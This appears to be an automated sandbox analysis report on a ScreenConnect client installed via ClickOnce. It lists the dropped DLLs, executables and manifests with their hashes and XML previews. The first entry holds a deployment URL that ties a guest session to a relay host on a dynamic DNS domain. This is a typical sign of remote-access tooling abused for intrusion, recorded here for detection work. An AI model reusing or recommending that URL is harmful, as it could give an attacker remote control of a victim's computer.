                                                                                                                                                                                                                                                                        Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.c.l.o.u.d.f.i.l.e.s.-.s.e.c.u.r.e...i.o./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.t.t.y.u.i.o...z.a.p.t.o...o.r.g.&.p.=.8.0.4.1.&.s.=.7.3.5.4.9.b.6.7.-.7.2.6.b.-.4.7.0.e.-.a.b.
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):242016
                                                                                                                                                                                                                                                                        Entropy (8bit):5.858471214140723
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:0FcfiVIfQZlENURlENURlENURlENURlENUcmt8vOvP:Oc26UCUCUCUCUh2cP
                                                                                                                                                                                                                                                                        MD5:D8259314C0A0D0B11E4979470E4B973A
                                                                                                                                                                                                                                                                        SHA1:552BDA7DE4DB0B4DC772C578664DCBDCC9E58D6C
                                                                                                                                                                                                                                                                        SHA-256:B8289C61E2C1A1076D4244823E71CD2D877FEA82504B45B0C80753F5BABD9E12
                                                                                                                                                                                                                                                                        SHA-512:47A93656BAAAE18242B930BD6F2574E6C62286D965142F2C7DF431B0754F92EE142BC4FD8CA719EB14EB40FE4EDAEB95DBB7ED7528A9B2CCAB34063FD887F3B0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                                                        Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                                        MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                                        SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                                        SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                                        SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1041
                                                                                                                                                                                                                                                                        Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                                        MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                                        SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                                        SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                                        SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                                        Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                                        MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                                        SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                                        SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                                        SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1636
                                                                                                                                                                                                                                                                        Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                                        MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                                        SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                                        SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                                        SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):95520
                                                                                                                                                                                                                                                                        Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                                        MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                        SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                                        SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                                        SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):548864
                                                                                                                                                                                                                                                                        Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                                        MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                                        SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                                        SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                                        SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1216
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                                        MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                                        SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                                        SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                                        SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1721856
                                                                                                                                                                                                                                                                        Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                                        MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                                        SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                                        SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                                        SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1982
                                                                                                                                                                                                                                                                        Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                                        MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                                        SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                                        SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                                        SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):61216
                                                                                                                                                                                                                                                                        Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                                        MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                                        SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                                        SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                                        SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):601376
                                                                                                                                                                                                                                                                        Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                                        MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                        SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                                        SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                                        SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2573
                                                                                                                                                                                                                                                                        Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                                        MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                                        SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                                        SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                                        SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):17866
                                                                                                                                                                                                                                                                        Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                                        MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                                        SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                                        SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                                        SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                                        Malicious:false
